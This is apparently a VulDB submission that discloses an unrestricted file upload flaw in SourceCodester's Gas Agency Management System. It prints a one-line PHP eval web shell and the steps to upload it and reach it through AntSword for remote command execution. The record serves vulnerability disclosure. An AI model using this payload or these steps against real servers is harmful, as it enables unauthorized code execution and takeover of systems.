| Title | SourceCodester Gas Agency Management System /gasmark/product.php has an unrestricted upload |
|---|
| Description | File uploads are not filtered, so uploading a one-sentence Trojan horse gets a shell.
Upload a shell like this:
```php
<?php @eval($_POST['shell']);?>
```
https://github.com/Drun1baby/CVE_Pentest/blob/main/Gas%20Agency%20Management%20System%20CMS/images/oneWorld.png
Then we check it:
https://github.com/Drun1baby/CVE_Pentest/blob/main/Gas%20Agency%20Management%20System%20CMS/images/Check.png
Then we can see it in /gasmark/assets/myimages/oneWord.php
Use AntSword to get a shell:
https://github.com/Drun1baby/CVE_Pentest/blob/main/Gas%20Agency%20Management%20System%20CMS/images/getShell.png
The source code website is https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html |
|---|
| User | Drunkbaby (UID 30821) |
|---|
| Submission | 11.08.2022 12:52 (4 years ago) |
|---|
| Moderation | 11.08.2022 13:44 (52 minutes later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 206173 [SourceCodester Gas Agency Management System oneWord.php shell privilege escalation] |
|---|
| Points | 20 |
|---|